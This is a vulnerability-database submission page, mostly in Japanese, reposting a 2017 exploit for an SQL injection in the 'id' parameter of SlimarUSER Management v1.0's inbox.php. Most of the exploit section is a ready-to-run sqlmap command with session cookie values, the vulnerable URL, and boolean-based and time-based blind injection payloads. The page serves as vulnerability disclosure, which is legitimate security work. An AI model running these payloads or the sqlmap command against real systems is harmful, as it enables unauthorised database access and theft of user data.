提出 #20: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection情報

タイトルSlimarUSER Management v1.0 – 'id' Parameter SQL Injection
説明Introduction Exploit Title: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection Date: 03.02.2017 Vendor Homepage: http://slimar.org Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview SlimarUSER is a PHP user management system full with features. The system allows website owners to manage their own users with complete login, registration and many other features. It can be used on its own, or integrated into any existing PHP powered website. Sqlmap command: sqlmap.py -u "http://locahost/userman/inbox.php?p=view&id=7" --cookie="PHPSESSID=de3052c5dbb1d535d423ee1a2dbb076b; id=4; password=%242y%2410%24UuYt6q5GXU5UO37xc3j3GeN2ZM1hHB1sWqsAMs1DXAoeewSH.WYgq" --batch --random-agent --dbms=mysql Vulnerable Url: http://locahost/userman/inbox.php?p=view&id=[payload] --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm ---
ユーザー
 KAAN KAMIS (UID 213)
送信2017年02月03日 08:07 (9 年 ago)
モデレーション2017年02月03日 23:21 (15 hours later)
ステータス承諾済み
VulDBエントリ96542 [SlimarUSER Management v1.0 /userman/inbox.php 識別子 SQLインジェクション]
ポイント17

Want to know what is going to be exploited?

We predict KEV entries!